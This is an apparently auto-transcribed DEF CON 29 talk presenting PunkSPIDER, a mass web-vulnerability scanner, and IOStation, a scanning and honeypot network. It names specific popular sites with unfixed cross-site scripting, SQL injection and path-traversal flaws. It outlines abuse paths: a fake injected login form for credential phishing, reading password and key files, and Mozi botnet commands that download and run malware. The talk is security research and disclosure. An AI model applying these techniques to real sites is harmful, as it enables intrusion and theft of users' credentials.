DEF CON 29 - hyp3ri0n aka Alejandro Caceres Jason Hopper - PunkSPIDER and IOStation: Making a Mess

Aug 5, 2021 17:39 · 9223 words · 44 minute read

- Hello, everyone. And welcome to Punkspider and IOStation, making a mess all over the internet.

00:07 - I am Jason Hopper, and I’m the Director of Research at QOMPLX, and I’m here with- - I’m Alejandro Caceres.

00:15 - I’m the Director of Computer Network Exploitation at QOMPLX.

00:19 - - Years ago, Alex invented or developed a system called PunkSPIDER, and I developed something called IOStation.

00:26 - They’re both pretty cool tools, and we’ve been dusting them off lately and starting to find some really good ways that we can work together.

00:33 - And this talk is just kind of about how they started, you know, how they’re going and where they’re gonna be soon.

00:41 - - Yeah, so start off with a little history lesson on what the fuck is PunkSPIDER, right? So PunkSPIDER was a distributed math web application fuzzing project run over a Hadoop cluster and storage in a distributed backend.

00:56 - Don’t worry if you didn’t fully understand that we’ll be going through what the fuck that means in a few later slides.

01:03 - It was based on some older technology. You vaguely might remember it as that showed anything with some SQL injection or some other vulnerabilities about like websites or some shit, that’s usually how people remember it.

01:17 - So if you remember something like that, that was QOMPLX.

01:21 - It was presented at ShmooCon on 2013, and also at the psych guest appearance at the DEFCON 2014 as well, so.

01:30 - Still a long time ago during this old release, everything was MapReduced, right? If you remember that time of where big technology was the big buzz word, instead of fucking like blockchain or whatever, then you remember times of big data, right? And the real game changer there was that we could now crunch data in a distributed manner that was not incredibly difficult, right? So MapReduce was not the most absolutely efficient way to do distributed computing, but it was absolutely one of the easiest and one of the most well-documented ones.

02:05 - Like you can follow simple tutorials and get a pretty decent cluster up and running.

02:09 - So it was actually really cool, and everything back then was MapReduce.

02:16 - So now I’m gonna show you my sick UI skills coming up.

02:20 - Nobody get intimidated, you know. This is the old PunkSPIDER, as you can see, there is a lot of, you know, just text, but main thing I wanted to show you is you would type in a URL.

02:34 - You could also make that kind of like wildcard URL, right? So like Darknet, Gitstar, for example.

02:41 - By the way, don’t actually go to the site. It used to be a stamp site, might’ve been taken down whatever two stamp ago.

02:47 - And for those of you that already have, you know, sorry, but what do you see, right? So you see that what’s returned, which is at the bottom bit there, is a last date scan.

02:59 - Of course, we wanna keep a records updated and a number of web application vulnerabilities that were fuzzing and scanning for.

03:07 - So obviously this is Blind SQL injection, SQL injection, cross-site scripting, path traversal, blah, blah, blah, other very serious vulnerabilities in websites, right? So what we’d love people to do is in a very, it’s just an extremely open passion.

03:23 - We had an open API, open UI, and everything, is you could search any websites that you wanted and get either aggregates statistics on the vulnerability state of, for example, if we were to do like star. edu, or just kind of do your own research, do your own vulnerability research.

03:44 - I believe by, you know, by the time this project sort of was shelved for a little bit, we had something like 3. 4 million vulnerabilities or something like that.

03:54 - So it was pretty cool. So now we’re out with the old, right? That was old chip, old technology, great technology, good stuff that inspired a lot of the technology that’s today, but it was still old, right? So now we’re back, we’re full on developing and it’s the biggest change to the project is that Hyperion Gray was bought by a company called QOMPLX.

04:22 - And QOMPLX has been really amazing about giving us the time, resources, money, backing, legitimacy, everything possible for us to succeed in this project.

04:37 - Meaning that really, this thing is flying right now.

04:41 - And I’ll get into some of the numbers and we’ll get into some of the specifics of what we’re checking for in PunkSPIDER right now.

04:48 - But this thing is really flying. It’s got dedicated engineering time.

04:51 - It’s not going back down, put it that way, and it’s only gonna get better and better.

04:56 - But anyway, that’s enough about PunkSPIDER, Hopper here is gonna give you some bit of backstory about IOStation.

05:03 - - Yeah, so IOStation used to be called Omnisense.

05:07 - I apologize if I accidentally say that in a sentence later, but Sysadmins have similarly never liked this program or the system either.

05:17 - It started pretty innocently, and sorry, what it is is just a giant collection of tools that generate and aggregate data and make that available to a user.

05:25 - And it really did start out quite innocently.

05:27 - I was just coming into the cybersecurity space and I started learning about just how crazy the DNS system is.

05:35 - Like what you can do with it, the way that it’s exploited and it’s such a seemingly simple system, but I couldn’t believe the, like the depth.

05:42 - And I was, you know, learning about DNS amplification attacks and decided, because the way that I learned things best is by recreating the wheel, that I would just write a DNS server from scratch, and I turned it into an amplification sinkhole and then started just getting real interested in that.

05:55 - So I was writing a blog post and I wanted to say, there are, you know, this many open recursive DNS servers on the internet.

06:02 - Recursive DNS server, of course, being one that will answer a query for any domain, it’ll go out and find the answer up the tree.

06:10 - And so I started, I couldn’t find that answer, how many there were on the internet? So I started writing a little Python script to do the scan, to find them.

06:16 - And then, you know, I realized that, although that sounds simple and conceptually it’s simple, there really is a lot of subtleties to actually being able to do even a simple scan at scale.

06:26 - And, you know, and then, and then, and then, it’s some giant deep rabbit hole.

06:30 - And before I knew it, you know, I had this big system.

06:35 - It’s made up of many different parts, but the primary parts are port scanning.

06:39 - It’s scanning over 25 ports. There’s a lot of like custom extractions that it’s doing.

06:45 - In addition to the obvious stuff like banner grabbing and service detection and things like that.

06:51 - On the Darkweb, we’re again doing port scanning, we’re trying to tease out any information on additional onion sites that might be hosted on the same VM or definitely any way that we can link it to a surface IP address or domain or something like that to do any attribution for sites that, you know, should be taken down with from law enforcement.

07:09 - We’re also, of course, crawling all these websites as well.

07:11 - So we’re doing, you know, Darkweb mentions for, you know, corporate entities and names of other things of interest.

07:18 - And, you know, coming from the pure cybersecurity space when we joined QOMPLX.

07:22 - QOMPLX is a cybersecurity company, but they really focus in assessing risk and transforming risk.

07:29 - And so there’s a bit of a mind shift that had to happen on my part where some things that are really good for pure cybersecurity actually don’t inform risk that well, and there are a lot of other tools that you can use in its place.

07:40 - So I’ve sort of been working on the system, but with that very much in mind.

07:44 - So a lot of the new kind of directions that I’m, or the new tooling or the new things that I’m interested in really are kind of going down that namespace, and that can be simple things or seemingly simple things like even just identifying what a corporation has.

07:56 - Like what are their assets? Where are they? Some corporations, honestly, can’t even answer that question for you.

08:02 - And so doing this in a kind of broad autonomous fashion is really interesting.

08:06 - How that informs other sort of risk metrics and then looking at kind of proxy measures, like what jobs are they hiring? What technologies do they have in those job ads? Like how does that potentially inform, you know, what they’re doing in-house? We also have some passive sensors, so I’ll call them, you know, we’re monitoring the global certificate transparency logs.

08:23 - So pretty well, any SSL certificate that’s generated, we record a copy of in near real-time.

08:29 - And then we also have another significant component, which is our listening network.

08:33 - So they’re basically these low interaction honeypots that are distributed globally and all across the IPv4 spectrum.

08:40 - And they’re out there sort of just, you know, listening.

08:44 - They then can identify the early onset of any sort of broad malicious activity or benign activity for that matter.

08:51 - And we can use that as a way to profile the threat in like a socklog, for example, you know, socks have a lot to deal with.

08:58 - They don’t need to be chasing down leads that ended up just being like Google crawlers or the university of, you know, whatever doing research.

09:05 - Similarly, we can use this to inform a risk score by looking at for any given corporation.

09:10 - If we know what our assets are, have any of them been involved in say, being part of a botnet? And if so, for how long? Like, you know, getting popped, you know, once last year is one thing.

09:19 - Getting popped and then remaining part of botnet or whatever for six months is kind of something else, that sort of speaks to their detection and remediation policies.

09:29 - Of course, I still have the amplification attack sinkhole.

09:32 - It’s not the most particularly valuable sensor, but you know, it’s an oldie and a goodie.

09:37 - And then you know, honestly, I started learning that if you just start registering with places and then looking under some rocks, there’s some really good data that you can get for free.

09:44 - I mean, Aaron and who is, sorry, Aaron and Ayana, you know, can provide lots of data.

09:50 - So I collect WHOIS data on IP addresses, which gives you ASN information, organization details, and point of contacts.

09:59 - I do get domain who is, but that’s such a low value signal.

10:01 - It’s almost not worth mentioning. One of the ways that Alex and I are collaborating right now actually is on doing some malware analysis that we capture in our network.

10:08 - So that would be, you know, just doing fingerprints, looking for what sort of network behavior might be going on, and trying to integrate that with some of the other tools to get a more broad picture of what’s really going on in the internet.

10:19 - And then I also record all information from the DNS root zone files for, you know, like a thousand top level domains, basically, anything that’s not a country code.

10:28 - And that can be really interesting just to identify suspicious domains as they pop up.

10:32 - They might be used as like a C2 server or fishing or something like that.

10:36 - But then it also can be used in actually identifying assets of a company.

10:41 - The other thing I forgot to mention is, you know, in terms of proxy metrics for the corporations, you can also do things like look at their SEC filings and try to evaluate, you know, for a company of this size in this industry, is their funding in cybersecurity sufficient? And lastly, you know, no cybersecurity tool is complete if you’re not pulling in some GeoIP data.

11:00 - (laughs) So this has been a big undertaking for a lot of years.

11:04 - And so I started of small, but I needed to rent some servers and things.

11:09 - And I figured I was more interested in spending money on something that I can hold in my hand and have forever for a long time.

11:15 - So instead of buying a lot of cloud services, I actually convinced my wife to allow me to build a small datacenter in the basement when we were redoing the basement anyway.

11:24 - And so the middle picture here is sort of the first version of that, where I’ve got a whole bunch of old desktops and I bought a few used Dell R710, which bang for your buck are awesome little machines.

11:37 - They’re real little workhorses. And I had to become an inner service provider, which meant, you know, registering with the government and applying for a license.

11:43 - I’ve got a BITS license, which is basic internet telecom services license, which means I can actually sell internet to my neighbors, which is funny.

11:50 - Although, you know, there’s not really much good reason to do so.

11:53 - It’s not exactly cost-effective, but I have used some cloud services.

11:57 - So I’ve done a lot of scanning for years using Linode.

12:00 - And Linode has always been really, really supportive.

12:03 - They, you know, have asked me to abide by a number of very reasonable guidelines and otherwise they provide me a lot of cover for the very large number of abuse complaints that I bring their way, which is really awesome.

12:17 - So, you know, if by chance anyone from Linode is out there, the trust and safety team in particular, who I feel like I’m on a first name basis with, thank you very much.

12:26 - (laughs) - And you know, one thing I’d like to say about this is that I had the lovely opportunity of seeing this project from kind of beginning to end.

12:40 - Not like there, I don’t live with Jason and his wife.

12:43 - (laughs) But I got to, you know, hear about like, “Hey, I’m thinking of building a datacenter,” all the way, you know, to that middle picture, which by the way, just to point out, Jason is a woodworker, metalworker, astronomer, blah, blah, blah.

12:58 - He does fucking everything and he’s good at it too.

13:02 - So he built his own little server rack right there.

13:05 - And you saw that once he surpassed that he bought a big fucking server rack.

13:09 - So that’s just fucking Jason. He’s crazy. - It’s true.

13:12 - - I just want to point out how insane it is that, you know, he literally built an internet service provider in his basement and he’s like, “Yeah, no big deal. ” - Just a Saturday.

13:21 - - So anything, that’s all. - No, it’s true.

13:24 - I was quite proud of that little server rack.

13:25 - You know, I use pocket holes and everything, you know, it was fun.

13:28 - But you know, Alex, we’ve been talking a big game here, man.

13:31 - What do you say we put our websites where our mouth is? I don’t know, that’s a terrible joke.

13:37 - (laughs) - Sure, no, I like it. Let’s put our websites where our mouth is.

13:42 - - All right, so- (laughs) So you know, a little preface on this one.

13:46 - So we do have a user interface that has been revamped since the one that Alex has shown.

13:52 - However, it is not released yet, and we are releasing a UI in the fall of this year.

13:59 - This is just our sort of internal alpha use version only.

14:03 - Functionally, I’m sure it bears some semblance to what we will end up releasing, but the one in the fall is going to be much, much nicer than this even.

14:12 - So, you know, this is PunkSPIDER. No good search engine is complete without a giant search bar.

14:19 - So up at the top here, I’m just gonna pick like a random domain, something that I don’t know, may or may not be a little bit popular and do a little search.

14:27 - And you can see that this kind of tumbler. com website had no vulnerabilities, but you know, there actually is this one called kickstarter. com, which just so happens to have, I see here a cross-site scripting vulnerability.

14:40 - So we display that, we show the parameter that we’re using to abuse this.

14:44 - And then we’ve got these handy-dandy buttons, which you can click to test the vulnerability, which will actually open up this webpage with payload and show you that it actually is, it is working.

14:54 - And then you can also copy a cURL command, which is kind of handy.

14:57 - If you want to, you know, change the text or do whatever.

15:00 - We also have this like fairly complex way of scoring these websites.

15:05 - So our thinking is that any one of the vulnerabilities that we’re testing for are just insane to have on a website modern times.

15:12 - You know, there’s no excuse for it, which means that if you have even one cross-site scripting vulnerability, your security posture basically is a giant dumpster fire.

15:21 - So we, I think very appropriately rank these websites on the scale of one to five dumpster fires.

15:28 - And that’s what this, you can kind of see it is here.

15:31 - So another kind of cool thing is a way that we’ve already started to kind of work together between the two projects is port scan data.

15:37 - So this is kind of an easy lift all things considered, but you can click on ports and see that, you know, this one, for example, is running, it looks like a mail server and an open SSH server.

15:47 - And so we’re starting to kind of bring these datasets together and start answering some communal questions.

15:51 - But at the end of the day, what we want this to be is just a giant database that users can search.

15:57 - You can look at your own domains. You can check the domains that you visit or frequent.

16:00 - We want this to be a really awesome security tool for the masses.

16:04 - And there are a few limits that we’ve had to walk a fine line on.

16:08 - Of course, we don’t want people coming here to just rip off the database and go do whatever, but we’ll kind of circle back to that, but yeah, did you have anything to add, Alex? - No, no, that was an excellent overview of our user interface.

16:21 - You’ll see the little country codes, of course, which as Jason mentioned, are essential to any security tool.

16:28 - - Absolutely. (laughs) So, you know, Alex, it’s funny, before this talk, I was actually on this website called archive. org, which I know is really, really popular.

16:37 - And this new browser extension I’ve got, has this like this eight on it, and it’s trying to tell me something.

16:42 - Do you know anything about that? - I don’t.

16:45 - (laughs) - You don’t. - Oh, I’m just kidding. (laughs) - I clearly knew them, but.

16:50 - Yeah, so what we really wanted to do here is PunkSPIDER has a few goals, and we’re gonna talk about them a little bit later.

16:59 - But one really big goal that we have is that we wanna engage not only with the security community.

17:05 - I know we’re speaking at DEFCON, and you’re probably with the security community.

17:08 - But I think it’s really important that we release our stuff out there so that it’s ingestible by normal humans, right? So if you look at the browser plugin, it’s really simple.

17:22 - You may have already guessed this. There are several vulnerabilities on archive. org.

17:29 - It has one dumpster fire rating, which I believe is appropriate for the number of vulnerabilities found and types of vulnerabilities found.

17:36 - And probably the most important part of this plugin frankly, is just that big red spider, right? So that red button just tells you, “Hey, this one site is dangerous. ” So anybody that knows something about web security doesn’t know anything about web security, et cetera, whatever.

17:54 - Anybody can really use this. One other really cool feature of this plugin is the trip report.

18:01 - So at the very bottom right of the plugin, you can see it says trip report, and if you click on that.

18:07 - We’ve only gone to some sites with cross-site scripting right now.

18:10 - So, you know, the results are kind of obvious in terms of what they do, but all we’re doing is we’re taking basic types of extremely serious web application vulnerabilities and giving you a rolled up kind of view in my last browsing session.

18:31 - How many websites did I visit that were vulnerable, right? So that’s something that you might wanna know.

18:36 - You might wanna say like, “Oh, shit! Okay, you know, I’ve been browsing for a week and I have like 1% vulnerable.

18:44 - I wanna go back and see who that was and determine if I want to give them more information, right?” Like extremely important for you to know that.

18:52 - So that’s what we wanted to do with this browser extension.

18:55 - It’s also got this little like reset button that you can press, that reset your stats.

18:59 - And one particularly important thing, Jason, if you could just go to like any random website, I don’t like Google ‘cause it’s pretty good, and open up the extension for me.

19:11 - - Yep. - You can see that it’s grayed out, right? That means that PunkSPIDER doesn’t currently have any data on it, or is it, I’m sorry, Jason.

19:24 - (faintly speaking) - Yeah, I went to Google, so it’s been scanned.

19:27 - Yeah, I know it’s green. It’s it’s been scanned.

19:29 - - Oh, fuck me, it’s green, okay. So Google has been scanned.

19:32 - So it’s gonna tell you if you’re clean as well.

19:35 - Another state of this particular plugin is gray, which means that we haven’t scanned it.

19:42 - If it is gray, then you have the option to submit it for scan.

19:46 - The scan is really, really, really fast. Like I’ve never seen it take more than like three or four minutes.

19:51 - So that’s currently the plugin. I wanted to show that with a major website like archive. org, because most of you have probably heard of it and it’s a very off use website, but we can move on to the next.

20:04 - - Yeah. So just to illustrate the vulnerability here, I’ll hit reset, and you can see it executing the payload, printing out the message that we’ve programmed.

20:13 - - Yeah. Which is totally elite. - Yep, total elite.

20:17 - - All right, cool. Let’s move on to the next one.

20:20 - - LendingTree. All right, go for it.

20:21 - - All right, so these fucking LendingTree people.

20:23 - Okay, so LendingTree, right? What can I say about them? Okay, I contacted them on Twitter about what I described to them as a horrible vulnerability that is very obvious in your website, and I did not receive an answer.

20:45 - I could give you a whole rant on my views on the fucking responsible disclosure, but I’m gonna save it.

20:53 - And just say that as you can obviously see from Jason loading the page is that, you know, this payload is executed seven times.

21:03 - There’s absolutely no filtering going on here, and you can also see that it’s just in a basic bitch, basic ask query parameter there, right? And that payload is not very complicated.

21:16 - That’s like the cross-site scripting payload basically, with like one thing at it.

21:21 - So there’s really no excuse. We contacted LendingTree.

21:27 - Let’s see, a journalist contacted LendingTree, I contacted, no, I did yeah.

21:32 - So two people contacted LendingTree, this was over a month ago and we still have received absolutely no response.

21:39 - That to me, it’s just egregious. We are not checking for really super complex second order blind SQL injections to get a fucking out of band shell.

21:51 - We’re giving really basic bitch perimeter injection here and just getting it right back.

21:57 - So any simple website scanner, whether it be opensource paid, whatever, should really be able to catch this.

22:04 - Hell, you should be able to catch this shit manually if you’re building this website.

22:08 - So it’s really a kind of inexcusable one, and because it’s a popular website, I felt like I’d go ahead and call them out.

22:16 - Also, well, yeah, I won’t pick on them anymore, but- - Yeah.

22:20 - - That’s all I have to say about LendingTree.

22:22 - - It’s funny too. You know, people complain about, you know, you get a pen test team, that’s not all that good.

22:28 - And all they do is run automated tools but they’re cheaper or whatever.

22:31 - Like when we’re talking about cross-site scripting and a lot of these vulnerabilities, like those would still expose these problems.

22:36 - So these companies are not even doing that.

22:38 - - Yeah, yeah. And I mean, if you include, even including like time of like an engineer, like that’s like 10 minutes, you know.

22:48 - Like it’s not a significant cost either, like so anyway.

22:53 - Moving on. My pleasure. - All right, we’re gonna move through the next ones.

22:55 - I think a little bit faster here, but that’s okay.

22:58 - This is a good one. - All right. Not a problem, bud.

23:00 - This is tapas. io. It is a mango website, not about delicious, delicious tacos, but that’s okay, right? So as you might’ve guessed here, if you click on the plugin or where to check Tom spider, whatever, you can see that it’s red, it has a vulnerability, and then it’s cross-site scripting vulnerability.

23:19 - I know that you didn’t see an alert box pop up, but let’s go through this website real quick and we’ll see what it has to say, right? So pretty basic login page, username, password, login, remember me, et cetera.

23:34 - Okay. That’s fine, right? So Jason, if you could just scroll all the way down to page four, please. - Sure.

23:41 - Oh, holy cow. There’s like this whole other login form almost completely by the footer.

23:47 - What’s that? - Yeah. So this is the real login form for the web page.

23:52 - Thanks for the lead in, bud. But this is the real login page for the website, right? So what all I’ve done is, because most cross-site scripting also has HTML injection vulnerability in it.

24:05 - We just push it down with a bunch of BR tags, right? So like line break tags.

24:12 - I pushed the real logging all the way down and created a fake login up at the top.

24:16 - So what does that allow me to do? That means that I can grab that link that’s in the little bar right there, send it to everybody that I know and it gives us tapas. io.

24:26 - Whether that be from a Twitter search or LinkedIn search, whatever search, and it’s something that they inherently trust, right? So now I can just sit back there, obvious user names and passwords.

24:38 - I know there’s still like some crosswords and restrictions that we need to kind of get around.

24:43 - This isn’t a web app hacking talk, so I won’t open up through those.

24:46 - But this is very easy to just start filling usernames and passwords is my point.

24:52 - And that sucks. So to anybody that says that reflected cross-site scripting is not that serious.

24:59 - You’re wrong. - This is why they’re wrong.

25:01 - (laughs) Yeah. So, you know, our tests aren’t looking just for cross-site scripting, although there are many of those.

25:10 - We’re also doing SQL injection, as Alex has said before.

25:14 - So this is an example of this. So primeinvestor. in, you know, presumably something to do with finances.

25:20 - They’ve got a login page. They might have pretty sensitive information behind this, and they’re not sanitizing their inputs.

25:27 - So we were able to have the web server execute SQL query just by putting it into like a text form or something like that.

25:34 - It’s also kind of interesting that it can also, even the error can give you back more information.

25:37 - Like this is clearly a WordPress site, but this is crazy.

25:41 - I mean, you know, all they’re doing is not sanitizing their input.

25:45 - I mean, most frameworks nowadays won’t let you avoid it.

25:48 - I mean, this has gotta be like, you almost have to go to your way to have this still be a problem.

25:52 - And it’s a huge problem because this is being executed with the same permissions as the web server itself.

25:57 - And so the web server must have read-write permissions on all the tables related to users and things like that.

26:03 - A website that has this kind of problem. It wouldn’t surprise me in the bit in the slightest, if they had plain text passwords being stored in the database.

26:09 - So potentially, they could just dump this whole thing.

26:11 - At the very least, they’re probably not insulting them or whatever, and you could just, you know, unhash them or something.

26:15 - But this is a massive problem, really. I mean, this is, yeah.

26:20 - I think you have, do you have more to say on that, Alex? - I do.

26:25 - You know, we think of sites like this, like primeinvestor. in as not a huge deal, right? I mean, whatever.

26:34 - You found some SQL injection. Good job, right? The problem with that is that we can no longer rely on that argument, right? So we are in the age of data breaches.

26:45 - We’re to a point where data breaches are so prevalent that, you know, you have tens of trillions of records sometimes and leak aggregators.

26:56 - Meaning that every breach whether it affects you directly, or whether it’s a website that you actually care, whether the username and password that you use on that website was sensitive or not, like it can still affect you, right? So once I set up nothing to do with you are now seriously affecting the security of corporations and people in general, right? So like I said, we’re in the age of the data breach and stuff like this is really inexcusable.

27:30 - To give you an idea, all of the websites that we’re showing are in Alexis top 5,000.

27:34 - Like you may not have heard of some of these websites, but they are the top websites on the internet.

27:40 - So to have something like this is, it’s really just irresponsible, quite frankly.

27:46 - It’s completely irresponsible, and it’s causing major problems across the internet these days.

27:53 - Like even the fucking colonial pipeline hack was the credential stuffing attack against their VPN, right? So I mean, that can be completely unrelated websites got breached, and then a VPN got breached.

28:07 - Like we can’t have websites like this out there that are just giving usernames and passwords.

28:14 - And we also know now from all these aggregators, that are being built and all the password research that’s going on, that one, people are fucking terrible at passwords.

28:25 - Like, you know, we get the secret five one, and that’s all of a sudden the fucking secure password.

28:31 - But the other thing is that people reuse their passwords everywhere.

28:36 - So even if it’s a site that you don’t necessarily care about, if you reuse that password in one single place, somebody could easily find it, and that’s all I have to say about that.

28:46 - - Yeah. I think the next example is actually pretty cool one.

28:50 - So this is a traversal attack, which means that we can put in the URL, the path to a different file or something that the web server should definitely not be allowed to access, or certainly shouldn’t be showing to a random website viewer.

29:03 - But we’re doing this with the passwords file in Linux, and what that does is it gives us a list of all the different users and groups, including all the system users that this server has.

29:13 - And this is a massive problem because basically this means that we can view files on the server easily.

29:18 - So we could go through this list, find a username that we think is a person or like an actual user.

29:23 - And then try to, for example, view their private key, their SSH private key.

29:28 - If we had that, then we could also take a few guesses that maybe some, if it’s on a VM or it’s just, you know, hosting this website even, you know, maybe it’s using some common frameworks like WordPress or something.

29:39 - So WordPress has some default installed folder.

29:42 - So maybe we can then go and try to look at the config file and get the database password.

29:46 - So now we could potentially login to the server and access the database freely, or the database of another server being hosted on the same VM.

29:54 - I mean, this server’s vulnerable, which means really, it’s putting all of its neighbors at risk.

29:59 - And it’s just, again, it’s just so silly, like, you know, fix the permissions.

30:04 - - Yeah. - Yeah. Lastly, this one is just sort of a bit of, you know, beating a dead horse here.

30:10 - But Kickstarter has a cross-site scripting vulnerability.

30:13 - So I just hit refresh here, you know, punks buttered back.

30:16 - (laughs) Nothing shows this off better.

30:18 - But Kickstarter is a bigger organization. They can afford, you know, like one intern to just go through and check for obvious scripting vulnerabilities and stuff like that.

30:27 - I mean, there’s really no reason for this. You give this company money, you have login credentials, you have user data.

30:34 - I mean, I don’t even know what else they probably have on the backend, but you know, you’re putting people at risk with this.

30:39 - - Yeah. - Cool. So all right, let’s head back to the slides.

30:44 - All right. So, you know, how is this being used, Alex? - Wonderful question, Jason.

30:50 - So I feel like we’re new tankers or something.

30:53 - (laughs) But anyway, so you’re probably wondering, of course, so we’re releasing a fuck ton of vulnerabilities, right? And we’re just giving them out for free.

31:03 - So how do you access them, right? A few ways you can use this.

31:07 - One, is the browser extension, which we’ve showing you.

31:10 - Of course, very, very useful. Please download that and use it if you like it.

31:16 - There’s a free and open REST API. You can search by vulnerability, domain name, wild cards are all allowed.

31:22 - You have even character wild cards and things like that.

31:25 - So full wild card search, there’s no limitation there.

31:30 - There’s a CLI tool that you can use as well, built by the wonderdul Mr. Hopper over here.

31:36 - So you can get stuff like that as well. Soon the come, search engine interface, already an alpha.

31:43 - Jason already showed you some of that. It’s certified vulnerability, domain name, wildcard scan, all in play.

31:49 - We don’t limit any of that kind of stuff. Recon-ng module.

31:52 - Tim Tome, you know him. Wonderful man, wonderful software.

31:56 - H8mail module, if you use that. Metasploit module, just because everything needs to Metasploit module and really anything that you all feel that you would like to see with this data, just shoot us ideas.

32:10 - We can build it or you can submit something, it’s an open source, you know, thing, whatever, but let us know how we can support you to support.

32:20 - Yeah. - Help us help you. - Let us know how can we help you, basically, and we will help you out, so. - Yeah.

32:28 - - Moving on from there. How do we do this, right? We get this question a good amount.

32:34 - How do you scan that many websites? You had to create your own scanner.

32:37 - You had your own fucking internet service provider, et cetera, et cetera.

32:41 - The real answer is it was just a ton of work and a lot of benchmarking, right? The original PunkSPIDER was built on old technology.

32:48 - So there’s a bunch of benchmarking I had to do in terms of what’s important.

32:52 - What’s important here? Computing power, memory, bandwidth, IO, all kinds of different things.

32:57 - So there was all kinds of tests that we needed to run to make sure that everything was running as smoothly and as quickly as possible.

33:04 - We had some creative engineering in there, right? So we’ve repurposed a lot of technology that’s really built for, you know, search engine technology, data analytics technology, all of that stuff is being used in the backend of PunkSPIDER.

33:19 - It’s just we’re completely repurposing it for the purposes of offensive security.

33:23 - Last thing that we did is we embraced the cloud, right? Ride the snake, meaning we’re addicted.

33:28 - We’re all of a sudden addicted to heroin. I mean, AWS.

33:32 - - Same thing. - What’s that? - Same thing.

33:35 - - Same thing, yeah. Very, very similar things to make addicted too.

33:39 - Both can costly thousands of dollars a month.

33:43 - AWS is probably more dangerous, but we really embraced it and we just realized like, you know, the world is kind of moving in in that direction, and so we may as well take advantage of that, right? So next slide, insert.

33:59 - All right, all I wanna show you is that we do have metrics and monitoring on the backend of the system.

34:03 - Like I said, it is a very well-funded, well-engineered system at this point.

34:10 - All I’m showing you here at the top left, you’ll see the word Ferret.

34:13 - Ferret is our custom built scanner, and all I really wanted to show you here is that there’s a bunch of different scan nodes, and each of those scan nodes is handling thousands of different websites.

34:25 - So this would get reshuffled and things like that, as more data either comes in or this cluster is scaled more, which is, to me, it looks like it needs to be skilled a little bit more, but it’s a good view into the fact that we are doing truly, truly mass distributed scanning.

34:44 - So we can move onto the next. Yeah.

34:49 - So actually you could skip this slide. - Okay.

34:52 - - All right. Thank you, sir. So how does this work, right? I wanted to give you a basic architecture of PunkSPIDER.

34:58 - We have a Kafka Queue. Kafka is a simple queuing system.

35:01 - So something comes in and something comes out to a system that’s ingesting that, right? The reason that we need a queuing system in order to do this is that we are submitting so many URLs that we need a piece of technology that is distributed and allows us to handle the level of data that we’re talking about because we’re submitting something like tens of billions of domains, which means hundreds of billions, if not trillions of actual webpages.

35:29 - So queuing technology is really important here, and it’s used very much with throughout PunkSPIDER.

35:34 - Next slide, please, sir. (laughs) - The ferrets.

35:37 - - Infinite Ferrets, right? So because that Kafka queue, again, distributed, just gives you a website.

35:44 - We need something to then scan that website.

35:46 - As I mentioned, that application is called Ferret, right? So that’s our web app fuzzer.

35:50 - It works really quickly, works in a distributed manner that kind of Kubernetes autoscaling.

35:57 - So we need a lot of Ferrets to really be able to scan all of these websites and get all of the data that we want, and then present that back to you, which is done in the next slide.

36:11 - And we see that we index these results into two different things.

36:14 - One is RDS for stats, and the other thing is cloud search to obviously build the search engine frontend for everybody.

36:23 - So all of this is kind of a simplified view into the entire thing.

36:27 - This feeds back into the queuing system, actually.

36:31 - And yeah, this goes back into the queuing system and can even create more URLs for us to scan and things like that.

36:40 - So that’s basically how it works on the backend.

36:44 - What I really wanted to point out is that everything is fucking distributed.

36:47 - Everything is distributed. That’s why I have pictures of lots of ferrets, pictures of lots of copycats, pictures of lots of results, right? Everything is distributed, so we can scale sky is the limit.

37:00 - - Cool. - Let me grab more data from IOStation, which Jason’s gonna tell you about.

37:05 - - Yeah. So, you know, running a datacenter has been a lot of work.

37:09 - It’s interesting. It’s one of those things where you have to decide where you want to put your time and effort.

37:15 - I’ve built this system on Postgres, which is awesome.

37:18 - If there’s a really specific reason, I’ll use something else, but I use Postgres a lot.

37:22 - Rabbit MQ, I used for years. However, I had an issue where it would just like disconnect consumers all the time.

37:30 - So all of the sensors will be passing messages to it and then the consumers would get disconnected.

37:34 - And then the queues would get so big that they would stop delivering messages, which makes no sense.

37:38 - And then even worse, they’d continue to get big and eventually explode the nodes.

37:42 - So I eventually replaced it with Kafka, which, you know, isn’t perfect, but I’ve definitely had much better results overall.

37:49 - And the rest of it is kind of Bash and Python, because I’ve been developing this myself to this point, and so kind of simplicity is key.

37:55 - You know, we’re moving as much complexity as you can in a lot of ways.

38:00 - It will make your life a little easier, when it’s just, you know, one person operation that is.

38:05 - So Alex showed his UI. So I thought I’d toss mine up here too.

38:07 - It’s pretty simple. You know, you type in an IP address, search it.

38:11 - It shows on the map where it’s resolving. We’ve got GIP and Whois data? And then for the port scan data, it shows each port in a different card.

38:21 - And I think I mentioned before, you know, it’s scanning over 25 ports, there’s a lot of custom extractions that are going on in this.

38:27 - And then, of course, the normal stuff, like, you know, service identification and banners, and stuff like that.

38:32 - And it’s too much to show in one screenshot, but below is where all the listening service data is.

38:37 - And then there’s SSL certs and things like that.

38:39 - This website has never been public nor probably will it ever be.

38:42 - But you know, can’t let someone show their old UI alone.

38:45 - It’s not appropriate. So just a really quick little case study, I guess, of something the thing that has been coming across IOStation.

38:53 - So there’s this thing called the Mozi botnet.

38:55 - Back in 2019, I started observing it. It’s known to other people, it’s a really big bottleneck right now.

39:02 - And basically, it’s trying to command injection on servers.

39:04 - So these are the two URLs that I see most of the time, and you can see one of them is next file = net gear. cfg.

39:10 - And then it pulls, it would get pulls this thing from an IP and port mozi. m is the file name, and then it runs it.

39:16 - And then similarly, the other one does the same thing, but Mozi. a, it executes it slightly differently.

39:21 - But basically this looks like it’s trying to do this on netgear equipment at a minimum.

39:25 - And we know from PunkSPIDER that there are tons of websites that are vulnerable to injection like this, so.

39:32 - So I started digging a little bit deeper and I used to listening, sorry, I use this data to identify where the attacks were coming from and where the malware was being hosted.

39:41 - And interestingly, they were always different IP addresses, whatever service, or sorry, whatever computer was saying, go download and run those malware was never the same IP addresses where it was being hosted.

39:52 - And they were mainly hosted in China, like predominantly, you know, definitely some in India.

39:56 - And of course it’s a botnet, so it’s spread across the world.

39:59 - But there was a huge amount of it coming from China, which was interesting because then when I looked at what sensors is the botnet was hitting mostly? It was really heavily hitting India, Japan, Australia, and then to a slightly lesser degree, Canada and Germany, but there were no hits in China, which was kind of funny.

40:18 - And I’m not trying to suggest that this is some sort of like, you know, clever state sponsored piece of malware or anything like that.

40:25 - I just thought it was funny that none of my Chinese servers actually saw any of this and it almost looks like kind of a geopolitical map, you know, a little bit.

40:32 - So yeah, China’s suspiciously missing there.

